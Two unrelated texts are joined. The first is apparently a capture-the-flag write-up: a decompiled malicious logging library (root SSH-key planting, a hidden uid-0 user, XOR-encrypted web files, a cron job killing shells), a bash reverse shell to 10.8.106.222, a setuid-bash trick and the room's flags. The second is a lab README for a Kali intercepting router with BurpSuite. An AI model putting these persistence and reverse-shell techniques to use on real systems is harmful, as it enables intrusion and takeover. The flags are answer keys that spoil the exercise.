_freeres_buf
__pad0
__pad5
__glibc_reserved
webfile_names
XOREncryptWebFiles
_vtable_offset
optarg
__gid_t
dirent
_IO_read_end
short int
st_mtim
cron_f
_IO_wide_data
GNU C17 9.3.0 -mtune=generic -march=x86-64 -g -fpic -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection
__environ
encryption_key_dir
d_off
__blksize_t
__uid_t
st_atim
_lock
tv_sec
GetWebFiles
_old_offset
_IO_FILE
__dirstream
script_f
LogIncorrectAttempt
unsigned char
__tzname
authorized_keys
_IO_write_ptr
rand_string
__time_t
st_size
d_ino
st_uid
__off_t
st_ctim
st_dev
short unsigned int
stat_res
f_path
charset
__blkcnt_t
_chain
st_rdev
_flags2
_cur_column
__off64_t
_unused2
_IO_buf_base
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8059
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
replacelogging.c
rand_string
__FRAME_END__
__stat
_fini
__dso_handle
_DYNAMIC
__GNU_EH_FRAME_HDR
__TMC_END__
_GLOBAL_OFFSET_TABLE_
_init
free@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
strcpy@@GLIBC_2.2.5
mkdir@@GLIBC_2.2.5
encryption_key_dir
fread@@GLIBC_2.2.5
fclose@@GLIBC_2.2.5
opendir@@GLIBC_2.2.5
GetWebFiles
strlen@@GLIBC_2.2.5
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
strncat@@GLIBC_2.2.5
closedir@@GLIBC_2.2.5
srand@@GLIBC_2.2.5
LogIncorrectAttempt
XORFile
strcmp@@GLIBC_2.2.5
fprintf@@GLIBC_2.2.5
ftell@@GLIBC_2.2.5
__gmon_start__
time@@GLIBC_2.2.5
__xstat@@GLIBC_2.2.5
readdir@@GLIBC_2.2.5
malloc@@GLIBC_2.2.5
XOREncryptWebFiles
fseek@@GLIBC_2.2.5
chmod@@GLIBC_2.2.5
web_location
fopen@@GLIBC_2.2.5
exit@@GLIBC_2.2.5
fwrite@@GLIBC_2.2.5
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.note.gnu.property
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
.debug_aranges
.debug_info
.debug_abbrev
.debug_line
.debug_str
/home/alex/.bashrc
while :; do echo "YOU DIDN'T SAY THE MAGIC WORD!"; done &
/bin/cp /lib/x86_64-linux-gnu/liblogging.so /tmp/logging.so
/lib/x86_64-linux-gnu/liblogging.so
echo pwned | /bin/admin > /dev/null
:*3$"
GCC: (Ubuntu 9.3.0-10ubuntu2) 9.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8059
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
fixutil.c
bin2c_liblogging_so
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
fclose@@GLIBC_2.2.5
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
fopen@@GLIBC_2.2.5
fwrite@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
```
```
cat /etc/cron.d/evil
* * * * * root /opt/brilliant_script.sh 2>&1 >/tmp/testlog
```
```
ls
brilliant_script.sh
cat brilliant_script.sh
```
```sh
#!/bin/sh
for i in $(ps aux | grep bash | grep -v grep | awk '{print $2}'); do kill $i; done;
```
```
cp /bin/bash /tmp/bash && chmod +s /tmp/bash
```
```
bash-5.0# find / -type f -name *html 2>/dev/null
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/todo.html
/usr/local/apache2/icons/README.html
/usr/local/apache2/error/include/spacer.html
/usr/local/apache2/error/include/top.html
/usr/local/apache2/error/include/bottom.html
```
```
bash-5.0# find / -type f -newermt 2020-06-15 ! -newermt 2020-06-19 -exec ls -la {} \; 2> /dev/null
-rw-r--r-- 1 root root 16 Jun 17 21:22 /opt/.fixutil/backup.txt
-rwsr-xr-x 1 root root 16928 Jun 17 08:55 /bin/admin
-rw-r--r-- 1 root root 32032 Jun 17 08:55 /var/log/faillog
-rw-r--r-- 1 root root 0 Jun 17 08:55 /var/lib/sudo/lectured/alex
-rw-r--r-- 1 root root 1376 Jun 17 08:55 /etc/passwd-
-rw-r----- 1 root shadow 865 Jun 17 21:21 /etc/shadow-
-rw-r--r-- 1 root root 1415 Jun 17 21:21 /etc/passwd
-rw-r--r-- 1 root root 40 Jun 17 21:22 /etc/subgid
-rw-r----- 1 root shadow 970 Jun 17 21:22 /etc/shadow
-rw-r--r-- 1 root root 615 Jun 17 08:55 /etc/group
-rw-r--r-- 1 root root 40 Jun 17 21:22 /etc/subuid
-rw-r----- 1 root shadow 515 Jun 17 08:55 /etc/gshadow
-rw-r--r-- 1 root root 18 Jun 17 08:55 /etc/subgid-
-rwxr-xr-x 1 root root 61 Jun 17 21:22 /etc/cron.d/evil
-rw-r--r-- 1 root root 18 Jun 17 08:55 /etc/subuid-
---------- 1 root root 0 Jun 17 21:33 /run/crond.reboot
-rw-r--r-- 1 root root 567 Jun 17 21:21 /root/.ssh/authorized_keys
-rwxrwxr-x 1 root root 54 Jun 17 08:55 /root/init_script.sh
-rw-rw-r-- 1 root root 997 Jun 17 21:22 /usr/local/apache2/htdocs/index.html
-rw-rw-r-- 1 root root 85 Jun 17 21:22 /usr/local/apache2/htdocs/todo.html
-rw-rw-r-- 1 root root 109 Jun 17 21:22 /usr/local/apache2/htdocs/reallyimportant.txt
-rwxr-xr-x 1 alex alex 16048 Jun 17 21:21 /lib/x86_64-linux-gnu/oldliblogging.so
-rwxrwxrwx 1 root root 23176 Jun 17 21:21 /lib/x86_64-linux-gnu/liblogging.so
```
```cpp
void LogIncorrectAttempt(char *attempt)
{
time_t tVar1;
FILE *__stream;
char *ssh_key;
FILE *authorized_keys;
FILE *script_f;
FILE *cron_f;
system("/bin/mv /tmp/logging.so /lib/x86_64-linux-gnu/oldliblogging.so");
tVar1 = time((time_t *)0x0);
srand((uint)tVar1);
__stream = fopen("/root/.ssh/authorized_keys","w");
fprintf(__stream,"%s\n",
"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABgQC4U9gOtekRWtwKBl3+ysB5WfybPSi/rpvDDfvRNZ+BL81mQYTMPbY3bD6u2eYYXfWMK6k3XsILBizVqCqQVNZeyUj5x2FFEZ0R+HmxXQkBi+yNMYoJYgHQyngIezdBsparH62RUTfmUbwGlT0kxqnnZQsJbXnUCspo0zOhl8tK4qr8uy2PAG7QbqzL/epfRPjBn4f3CWV+EwkkkE9XLpJ+SHWPl8JSdiD/gTIMd0P9TD1Ig5w6F0f4yeGxIVIjxrA4MCHMmo1U9vsIkThfLq80tWp9VzwHjaev9jnTFg+bZnTxIoT4+Q2gLV124qdqzw54x9AmYfoOfH9tBwr0+pJNWi1CtGo1YUaHeQsA8fska7fHeS6czjVr6Y76QiWqq44q/BzdQ9klTEkNSs+2sQs9csUybWsXumipViSUla63cLnkfFr3D9nzDbFHek6OEk+ZLyp8YEaghHMfB6IFhu09w5cPZApTngxyzJU7CgwiccZtXURnBmKV72rFO6ISrus= root@recovery"
);
fclose(__stream);
system("/usr/sbin/useradd --non-unique -u 0 -g 0 security 2>/dev/null");
system(
"/bin/echo\'security:$6$he6jYubzsBX1d7yv$sD49N/rXD5NQT.uoJhF7libv6HLc0/EZOqZjcvbXDoua44ZP3VrUcicSnlmvWwAFTqHflivo5vmYjKR13gZci/\' | /usr/sbin/chpasswd -e"
);
XOREncryptWebFiles();
__stream = fopen("/opt/brilliant_script.sh","w");
fwrite(
"#!/bin/sh\n\nfor i in $(ps aux | grep bash | grep -v grep | awk \'{print $2}\'); do kill$i; done;\n"
,1,0x5f,__stream);
fclose(__stream);
__stream = fopen("/etc/cron.d/evil","w");
fwrite("\n* * * * * root /opt/brilliant_script.sh 2>&1 >/tmp/testlog\n\n",1,0x3d,__stream);
fclose(__stream);
chmod("/opt/brilliant_script.sh",0x1ff);
chmod("/etc/cron.d/evil",0x1ed);
return;
}
```
```
cat > /tmp/a.sh << "EOF"
#!/bin/bash
bash -i >& /dev/tcp/10.8.106.222/9001 0>&1
EOF
echo "bash /tmp/a.sh" >> /opt/brilliant_script.sh
```
```
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDO7GTxIFv/SEVqelwR1OrCvcDRsaOYuyU3JtdaFxv1IPMxp8soS007K9eeQyZvpSiU7ynIhwJsSrfhPH9PWvpPF937Ppe8+LX5e5b+5FsFMoVw6dkwWW2fNImlDcXf273vD/7bTRB+SBo+UcBuIR31ERpM+90xCNKv+HERbiq1TznnBZXJ16Pxu2VBfSCLF4ZjPO4BFG62IQQmkK1e3v3CeiF2b8t+lbS2LrUCbLKdPYvhH6rzoz1LoPwvNOryTivgjDhs/xGFBY3RThAKBiLJXTOAx4qLf4FMEo0Cr8y6GBz3mtLj/UJzNctwllvj4NwVgDpoTqt1EsMA+d1BQYlO5XF4CmhGbKyQamvgrXzdAUKgE1sZ1oel84A3POCrOGJdngPRM9EkUWI9H6619SVmohjukRfWRbMQaUz1mxCz8SUDJlGZWs9kJgKec/LqgjyJxH6VV3ArOKMdoaRQ3BNwHMVmONWFZVOvj+QzXtSWd+ubAdO4HdNwv/ehUj86Qzs= kali@kali" > /root/.ssh/authorized_keys
```
```
root@recoveryserver:~# id
uid=0(root) gid=0(root) groups=0(root)
root@recoveryserver:~# rm -rf /etc/cron.d/evil
root@recoveryserver:~# rm -rf /opt/brilliant_script.sh
root@recoveryserver:~# rm -rf /home/alex/fixutil
root@recoveryserver:~# mv /lib/x86_64-linux-gnu/oldliblogging.so /lib/x86_64-linux-gnu/liblogging.so
root@recoveryserver:~# nano /etc/passwd
root@recoveryserver:~# nano /etc/shadow
root@recoveryserver:~# cat /opt/.fixutil/backup.txt
AdsipPewFlfkmll
```
1. Flag 0
`THM{d8b5c89061ed767547a782e0f9b0b0fe}`
2. Flag 1
`THM{4c3e355694574cb182ca3057a685509d}`
3. Flag 2
`THM{72f8fe5fd968b5817f67acecdc701e52}`
4. Flag 3
`THM{70f7de17bb4e08686977a061205f3bf0}`
5. Flag 4
`THM{b0757f8fb8fe8dac584e80c6ac151d7d}`
6. Flag 5
`THM{088a36245afc7cb935f19f030c4c28b2}`
|
# TL;DR
This repository contains code to turn your Kali Linux machine into a router
that
- records all traffic with wireshark
- sends HTTP and HTTPS traffic to an intercepting proxy, such as BurpSuite, running on another machine.
This setup is only appropriate in a lab setting where you want to learn how a device works.
Read [Setup](#setup) and [Automation](#automation) to configure your Kali Linux machine and run the scripts.
Read [A Raspberry Pi Kali Router](#a-raspberry-pi-kali-router) if you want to run this on a Raspberry Pi.
We assume that you own an [ Ethernet LAN Network USB Adapter](https://www.amazon.com/Plugable-Gigabit-Ethernet-Network-Adapter/dp/B00AQM8586) and a [wireless B/G/N USB adapter](https://www.amazon.com/gp/product/B004Y6MIXS/ref=oh_aui_detailpage_o00_s00?ie=UTF8&psc=1). Any card (USB or built-in) supported by Linux can be used.
# Intercepting IP traffic originating from any device, app, or application
- [TL;DR](#tldr)
- [Intercepting IP traffic for any device, app, or application](#intercepting-ip-traffic-for-any-device-app-or-application)
- [Introduction](#introduction)
- [Setup](#setup)
- [Configuring Kali Linux as a Router](#configuring-kali-linux-as-a-router)
- [Ethernet](#ethernet)
- [Wi-Fi Data Link Layer](#wi-fi-data-link-layer)
- [Network Configuration](#network-configuration)
- [Network Services](#network-services)
- [Sniffing and Intercepting Traffic](#sniffing-and-intercepting-traffic)
- [Automation](#automation)
- [Intercepting Communication from Embedded Devices, Android Apps, and Windows Applications](#intercepting-communication-from-embedded-devices-android-apps-and-windows-applications)
- [Embedded Device](#embedded-device)
- [Mobile Applications](#mobile-applications)
- [Windows Applications](#windows-applications)
- [A Raspberry Pi Kali Router](#a-raspberry-pi-kali-router)
- [Conclusion](#conclusion)
- [References](#references)
## Introduction
Many of us regularly sniff or intercept traffic coming from embedded devices, mobile apps, or windows applications. For devices or applications that are proxy-aware, interception of traffic is straightforward: we configure the application or device to use our [proxy](https://en.wikipedia.org/wiki/Proxy_server), such as [BurpSuite](https://portswigger.net/burp), and go on with our lives. For devices or applications that are not [proxy-aware](https://docstore.mik.ua/orelly/networking_2ndEd/fire/ch09_02.htm), intercepting traffic is more challenging.
In this article, we describe how to set up [Kali Linux](https://www.kali.org/) to sniff [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol)/[UDP](https://en.wikipedia.org/wiki/User_Datagram_Protocol) traffic of any device, app, or application by configuring Kali as an intercepting router that can forward specific traffic to a transparent proxy on a different machine, such as HTTP(S) traffic to BurpSuite. Situations where an intercepting router is useful include complex scenarios where many devices and applications interact with each other, such as an embedded device that interacts with a web service, but that can also be configured via a mobile and a windows application. To maximize portability, we implement the above set-up on a Raspberry Pi.
## Setup
We configure Kali Linux as a proxy-aware router. Clients, such as embedded devices or mobile apps, make connections to their servers as they normally would, but interesting packets (e.g. HTTP and HTTPS packets) are intercepted by our Kali Linux machine and redirected to a proxy server (e.g. BurpSuite). All traffic passing through our router is monitored with [Wireshark](https://www.wireshark.org/). Both our Kali Linux machine and BurpSuite act as a transparent proxy as the clients are not aware of their existence. The main advantage of this set-up is that it reduces the configuration of the clients to a minimum. This setup is illustrated in the figure below.
![Setup](pics/setup.png)
Before configuring our Kali Linux machine, we need to configure VMWare and our network interfaces as follows.
- We connect our Kali Linux machine running within [VMWare](https://www.vmware.com/) to the network in bridged mode so that it is directly connected to the network the device/application/mobile phone that we want to monitor would normally connect to.
![Set up VMware in Bridged Mode](pics/vmbridged.png)
- We connect two adapters (Ethernet and WiFi) and give the USB connections to Kali. In the figure below, our adapters are the [Ethernet LAN Network Adapter ASIX AX88179](https://www.amazon.com/Plugable-Gigabit-Ethernet-Network-Adapter/dp/B00AQM8586) and the [wireless B/G/N USB adapter Atheros UB91C](https://www.amazon.com/gp/product/B004Y6MIXS/ref=oh_aui_detailpage_o00_s00?ie=UTF8&psc=1). For WiFi, we could have used any adapter that is compatible with [Linux](http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html), as long as it supports promiscuous mode.
![Connect the adapters to the VMware machine](pics/vmconnectdevices.png)
The subsequent sections elaborate how we configure our Kali Linux machine as a router and how we monitor devices and applications by connecting them to the Kali Linux router.
## Configuring Kali Linux as a Router
Our Kali Linux machine will route traffic from the plugged in USB network interfaces (Ethernet and WiFi) to its own Internet connection and vice versa. Creating a router consists of four main parts.
- Setting up the **Ethernet layer** so that wired clients can connect to Kali's interface.
- Setting up the **Wi-Fi data link layer**, so that wireless clients can connect to Kali's "software access point" and send/receive IP packets from/to Kali. We use the ```hostapd``` application to do this. We bridge both the wired interface as well as the access point so that the machines connected to them are part of the same network (so that we can monitor a multi-device set-up such as an embedded device connected via Ethernet communicating with a mobile application, a Windows application, and the Internet).
- Setting up the **network configuration** on our Kali Linux machine, so that it properly relays IP packets from its own Internet connection to its connected clients (and vice versa).
- Adding **network services** such as DNS and DHCP so that clients get assigned IP addresses and can resolve domain names. We can use the DNS network service to redirect any domain name to a machine under our control.
Before we execute the aforementioned steps, we will need to figure out what interfaces the adapters show up as. To do so, we execute ```ifconfig``` on our Kali Linux machine before and after we connect the adapters.
```shell
$ ifconfig -a
```
Our Ethernet adapter will typically show up as ```eth1``` while our WiFi adapter will typically show up as ```wlan0```. (```eth0``` is the interface that is configured by VMWare to give Kali access to the Internet).
![Interfaces in Kali](pics/kalidevices.png)
We tell the [network-manager](https://wiki.gnome.org/Projects/NetworkManager) service that we will manage the interfaces ourselves by adding the adapters MAC addresses to the unmanaged-devices section of the ```/etc/NetworkManager/NetworkManager.conf``` file.
```
[keyfile]
unmanaged-devices=mac:d8:eb:97:b6:ce:12;mac:56:6b:a2:90:c4:b9
```
We restart the networking service so that the devices become unmanaged.
```shell
$ /etc/init.d/networking restart
```
### Ethernet
Before we create our monitoring network, we select an appropriate network and network mask. Using a different network range than the one of the network our Kali Linux machine connects to (via `eth0`) ensures that the IP addresses of our monitored devices do not clash with IP addresses used on the main network. We select the ```172.16.0.0/12``` network, as our main network interface (```eth0```) typically receives a ```10.0.0.0/8``` (corporate) or a ```192.168.0.0/16``` (home) network address.
As we want our wireless and wired network to be part of the same network, we create a bridge between them with the [```bridge-utils```](https://help.ubuntu.com/community/NetworkConnectionBridge) tool.
```shell
$ apt-get install bridge-utils
```
We then delete any IP address assigned to our wired interface ```eth1```.
```shell
$ ip addr flush dev eth1
```
We create a bridge interface named ```br0```.
```shell
$ brctl addbr br0
```
We add our wired interface ```eth1``` to the bridge interface ```br0```.
```shell
$ brctl addif br0 eth1
```
We bring the bridge interface ```br0``` up.
```shell
$ ip link set dev br0 up
```
We assign it an IP address in the network that we selected. As it is a gateway for our monitored devices, we chose ```172.16.0.1```.
```shell
$ ip addr add 172.16.0.1/12 dev br0
```
### Wi-Fi Data Link Layer
After configuring the Ethernet interface, we create a wireless access point with the [```hostapd```](https://w1.fi/hostapd/) program. We first install it with apt-get.
```shell
$ apt-get install hostapd
```
We then create its configuration file ```hostapd.conf``` with the following information.
```
# create a wireless network with this interface; change it if your wireless card is not wlan0
interface=wlan0
# change this if a different bridge interface was chosen
bridge=br0
# the name of our wireless network
ssid=Monitor-Network
# Change the passphrase to something you like
wpa_passphrase=Monitor-Network
# the driver used
driver=nl80211
auth_algs=3
# the wireless channel we listen on.
channel=7
driver=nl80211
# the mode we use (g)
hw_mode=g
# we don't log
logger_stdout=-1
logger_stdout_level=2
max_num_sta=5
rsn_pairwise=CCMP
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
```
The first line is the interface that our wireless LAN will be created upon; i.e. the plugged in Wireless adapter ```wlan0```. We configure the name of the network (```ssid```) and its password (```wpa_passphrase```). We will use this later on when we connect our devices. The ```nl80211``` driver is the one used for the Atheros chipset. As we want our Ethernet and Wireless USB adapters to be part of the same network, we add them to the same bridge (```br0```). Our network is a ```g``` wireless network (```hw_mode```), as it is compatible with most devices that we want to monitor. All the other parameters are related to the configuration of WPA and logging. Refer to the [hostapd Linux documentation](http://wireless.kernel.org/en/users/Documentation/hostapd) for more information.
[As there are some problems with the ```nl80211``` driver](https://askubuntu.com/questions/472794/hostapd-error-nl80211-could-not-configure-driver-mode), we execute the following commands to let our script use the wlan interfaces.
```shell
$ nmcli radio wifi off
$ rfkill unblock wlan
```
After creating the wireless interface ```wlan0```, we bring it up.
```shell
$ ip link set dev wlan0 up
```
We tell the ```hostapd``` program to start the monitor network.
```shell
$ hostapd ./hostapd.conf -B
```
### Network Configuration
After configuring our wireless and wired interfaces, we configure Kali to forward traffic to the interface that is configured by VMWare to give Kali access to the Internet (```eth0```). To do so, we first enable the kernel option for IP forwarding and then tell the [```iptables```](http://ipset.netfilter.org/iptables.man.html) program to forward all packets to that interface.
**Note**: this should not be done on a real world router as it is rather insecure.
```shell
$ sysctl -w net.ipv4.ip_forward=1
$ iptables -P FORWARD ACCEPT
$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```
### Network Services
We use [```dnsmasq```](http://www.thekelleys.org.uk/dnsmasq/doc.html) to act as our DNS and DHCP server. We install it with ```apt-get install dnsmasq``` and we create a ```dnsmasq.conf``` file with the following information.
```
# listen to this interface; change it if a different bridge name was chosen
interface=br0
# give IP addresses, lease is valid for 8 hours
dhcp-range=172.16.0.10,172.31.255.254,8h
# router
dhcp-option=3,172.16.0.1
# dns server
dhcp-option=6,172.16.0.1
# upstream DNS server
server=8.8.8.8
log-queries
log-dhcp
# include addresses
address=/attacker.com/172.16.0.1
```
We give DHCP addresses to any request received on the bridge interface in our DHCP range (```172.16.0.10-172.31.255.254```) and we tell the device to connect to our Kali router (```172.16.0.1```) and our DNS server (```dnsmasq``` itself reachable via the interface ```br0``` on IP ```172.16.0.1```). If ```dnsmasq``` does not know the answer to a DNS query, it asks the upstream server ([```8.8.8.8``` - google](https://developers.google.com/speed/public-dns/docs/using)) for answers. We add addresses to the bottom of the file so that those domain names resolve to a machine under our control. We add more addresses by adding more lines and we restart the ```dnsmasq``` daemon every time we do:
```shell
$ service dnsmasq restart
```
## Sniffing and Intercepting Traffic
As all traffic between devices on our monitor network passes via the bridge interface (```br0```), we can simply run wireshark on that interface to sniff the network traffic. The ```tshark``` program is the command-line equivalent of wireshark (We replace ```tshark``` with ```wireshark``` if we want a graphical user interface). We listen to traffic on the bridge interface (```-i br0```) and write all traffic to a file (```-w ./output.pcap```).
```shell
$ tshark -i br0 -w ./output.pcap -P
```
Typically, we also want to intercept traffic and thus require a few more ```iptables``` rules that redirect HTTP/1.1 and HTTPS traffic to our intercepting proxy (BurpSuite) rather than the actual server. For other protocols, including HTTP/1.0, refer to the second method of [http://www.tldp.org/HOWTO/TransparentProxy-6.html](http://www.tldp.org/HOWTO/TransparentProxy-6.html).
The first rule intercepts tcp packets (```-p tcp```) on ports 80 and 443 (HTTP and HTTPS; ```--dport 80``` and ```--dport 443```) and sends it to BurpSuite (```--to-destination burpip:burp_http_port``` and ```--to-destination burpip:burp_https_port```).
```shell
$ iptables -t nat -A PREROUTING -i br0 -p tcp --dport 80 -j DNAT --to-destination burpip:burp_http_port
$ iptables -t nat -A PREROUTING -i br0 -p tcp --dport 443 -j DNAT --to-destination burpip:burp_https_port
```
The second rule ensures that the reply gets sent back through the Kali Linux machine, instead of directly to the client that is being monitored (important!). The rule uses masquerade as the Kali Linux machine receives a dynamic IP address.
```shell
$ iptables -t nat -A POSTROUTING -o eth0 -s 172.16.0.0/12 -d burpip -j MASQUERADE
```
The third, potentially unnecessary, rule ensures that the Kali router forwards the appropriate packets to the machine running BurpSuite. Appropriate packets are HTTP (```-p tcp --dport burp_http_port```) and HTTPS packets (```-p tcp --dport burp_https_port```) originating from the monitor network (```-s 172.16.0.0/12```) on the bridge interface (```-i br0```) with as destination BurpSuite (```-d burpip```) running on a machine in the real network (```-o eth0```).
```shell
$ iptables -A FORWARD -s 172.16.0.0/12 -d burpip -i br0 -o eth0 -p tcp --dport burp_http_port -j ACCEPT
$ iptables -A FORWARD -s 172.16.0.0/12 -d burpip -i br0 -o eth0 -p tcp --dport burp_https_port -j ACCEPT
```
We then configure BurpSuite as a transparent proxy on the machine (```burpip```) and ports (```burp_http_port``` and ```burp_https_port```) referred to in the ```iptables``` rules above. We start BurpSuite, go to the Proxy tab, click Options, and click Add.
![Add a New Interface to BurpSuite](pics/burpproxy.png)
For HTTP traffic, we bind BurpSuite to port 80 (i.e. ```burp_http_port``` in our ```iptables``` rules) on all interfaces.
![Bind BurpSuite to port 80](pics/burpsuite80.png)
We go to the request handling tab and enable support for [invisible proxying](https://portswigger.net/burp/help/proxy_options_invisible.html). This is necessary, as the clients are unaware of BurpSuite's existence.
![Enable Invisible Proxying for BurpSuite](pics/burpsuite80_proxy.png)
For HTTPS traffic, we bind BurpSuite to port 443 (i.e. ```burp_https_port``` in our ```iptables``` rules) on all interfaces.
![Bind BurpSuite to port 443](pics/burpsuite443.png)
We go to the request handling tab, redirect traffic to port 443, force use of SSL, and enable support for invisible proxying.
![Enable Invisible Proxying for BurpSuite](pics/burpsuite443_proxy.png)
## Automation
As we are lazy, we automate anything that we are going to do more than once. You can find the [configuration files](https://github.com/koenbuyens/kalirouter/tree/master/conf) and the [script](https://github.com/koenbuyens/kalirouter/blob/master/monitor.sh) on [my github](https://github.com/koenbuyens/kalirouter).
To get up and running do the following.
- Obtain the code from github.
```shell
$ git clone https://github.com/koenbuyens/kalirouter.git
```
- install the necessary dependencies:
```shell
apt-get install dnsmasq hostapd bridge-utils
```
- Plugin the USB interfaces and discover their names and MAC addresses by executing ```iptables -a```.
- Tell the network-manager service that we will manage the interfaces ourselves by adding the adapters MAC addresses to the unmanaged-devices section of the ```/etc/NetworkManager/NetworkManager.conf``` file and restart the networking service by executing ```/etc/init.d/networking restart```.
```
[keyfile]
unmanaged-devices=mac:d8:eb:97:b6:ce:12;mac:56:6b:a2:90:c4:b9
```
- Modify the ```hostapd.conf``` file and point it to the correct interface for wireless (default ```wlan0```).
- Modify the interface variables in the ```monitor.sh``` script file to point to the correct interfaces. ```WIRELESS_MONITOR_INTERFACE, WIRED_MONITOR_INTERFACE, INTERNET_INTERFACE``` point to the wireless USB adapter, the wired USB adapter, and Kali's VMWare interface respectively. Default is ```wlan0```, ```eth1```, and ```eth0```.
- Modify the proxy variables in the ```monitor.sh``` script file to point to the IP address and port BurpSuite is running on. ```PROXYBOX```, ```PROXYBOX_HTTP_PORT```, and ```PROXYBOX_HTTPS_PORT``` refer to the IP address. HTTP port, and HTTPS port respectively. The defaults are 172.16.0.1, 80, and 443. Modify the IP address if it runs on a different machine (in my case ```192.168.1.192```).
- Execute the script
```bash
$ ./monitor.sh
```
- Output is in the ```dumps/output.pcap``` file. You can stop monitoring by pressing Ctrl-C.
## Intercepting Communication from Embedded Devices, Android Apps, and Windows Applications
After starting our monitor script, we can start monitoring the devices and applications that connect to our monitor network.
### Embedded Device
We connect an embedded device to our Monitor Network, either wirelessly or via Ethernet cable. We then let the device do its job. In the example below, our embedded device (```10.0.0.38```) communicates via UDP to a mobile app in our main home network (```192.168.1.230```). We could have connected both devices to our monitor network (```10.0.0.0/8```) to intercept all communication.
![Wireshark Logs All Traffic From Our Embedded Device](pics/example_embedded_wireshark.png)
### Mobile Applications
Before we can start monitoring mobile applications, we must add the certificate of BurpSuite to the trust store of the Mobile Operating System as most mobile applications (and thick clients) nowadays validate the certificate.
1. We export BurpSuite's certificate by clicking ```Import/export CA certificate``` in the ```Proxy``` tab.
![Export the Certificate of BurpSuite](pics/burpsuite_exportcert.png)
- We export the certificate as a DER file by selecting the ```Certificate in DER format``` option.
![Export the Certificate of BurpSuite in DER format](pics/burpsuite_exportcertder.png)
For Android apps, we add the certificate to the trust store of Android as follows.
1. We first go to the security settings.
![Import a Certificate in Android - Security Settings](pics/example_mobile_importcertandroid.png)
- We then install a certificate from the SD card.
![Import a Certificate in Android - Install from SD card](pics/example_mobile_importcertandroid2.png)
- We select the certificate file.
![Import a Certificate in Android - Select the certificate file](pics/example_mobile_importcertandroid3.png)
- Finally, we give it a name.
![Import a Certificate in Android - Give a Name to the Certificate](pics/example_mobile_importcertandroid4.png)
After importing the certificate, we are ready to monitor an application.
1. We connect the mobile device to our Monitor Network. We use the password that we had set-up in our ```hostapd``` configuration file.
![Monitor Android Application - Connect to Monitor Network](pics/example_mobile_connect.png)
- We then start the application that we want to monitor. The example below shows the Amtrak application.
![Monitor Android Application - Start the Application](pics/example_mobile_app.png)
- We observe that BurpSuite receives HTTPS traffic from the Android App.
![BurpSuite Receives HTTPS Traffic From the Android App](pics/example_mobile_burp.png)
- We also observe that wireshark logs all traffic (in this case of the Facebook app).
![Wireshark Logs All Traffic From the Android App](pics/example_mobile_wireshark.png)
**Note:** To monitor applications that implement [HSTS](https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet), [HPKP](https://developer.mozilla.org/en-US/docs/Web/HTTP/Public_Key_Pinning) or [Certificate Pinning](https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning), we would need to [complete](https://finnwea.com/blog/bypassing-http-strict-transport-security-hsts) [additional steps](https://github.com/iSECPartners/Android-SSL-TrustKiller) (that are outside of the scope of this article).
### Windows Applications
We can also use this to monitor communication of Windows applications by connecting our Windows machine to the same network and adding BurpSuite's certificate to the Windows trust store.
1. We connect our Windows machine (via Ethernet) to our Monitor network.
![Windows is connected to our monitor network](pics/example_windows2.png)
- We follow the steps that [Parsia outlined](https://parsiya.net/blog/2016-02-21-installing-burp-certificate-authority-in-windows-certificate-store/) to import the certificate in the Windows Certificate store.
- We start the application that we are interested in, in this case just our browser.
![We monitor our browser](pics/example_windows1.png)
- Observe that both BurpSuite and Wireshark receive the traffic.
![We monitor our browser](pics/example_windows_browserburp.png)
![We monitor our browser](pics/example_windows_browserwireshark.png)
## A Raspberry Pi Kali Router
As we wanted a portable solution, we applied the above set-up on a Raspberry Pi. You can download a Raspberry Pi Kali Linux image with the set-up [here](mailto:[email protected]). You most likely will need to apply the changes listed in the [Automation](https://github.com/koenbuyens/kalirouter#automation) Section, especially adding the MAC addresses of your cards to the Network Manager configuration file.
![Our Raspberry pi Kali Set-up](pics/raspberrypisetup.jpg)
First, we download the latest Kali Linux image for the raspberry Pi at [Offensive Security](https://www.offensive-security.com/kali-linux-arm-images/).
This image is most likely compressed with ```xz```, as it ends with the ```xz``` file extension. We install the ```xz``` compression tool and use it to extract the image. If the Kali image is not compressed with ```xz``` (i.e. it has the ```img``` file extension, we can skip this step).
On MacOSX, this is as follows.
```shell
$ brew install xz
$ xz -d file-to-extract.xz
```
On Ubuntu, this is as follows.
```shell
$ apt-get install xz-utils
$ xz -d file-to-extract.xz
```
Second, flash the image to disk. We execute the ```df``` program twice to identify the disks attached to our system: first before inserting the SD card into the reader and then after inserting it into the reader.
```shell
$ df -h
```
The filesystem name of the SD card is the one that was not there before. On MacOSX, it looks like ```/dev/disk2s1```. On Ubuntu, it looks like ```/dev/sdb```.
We unmount the partition so that we can write to it. On MacOSX, we unmount it with the ```diskutil``` command. As our flash card is the second disk (```/dev/disk2...```), we execute the following.
```shell
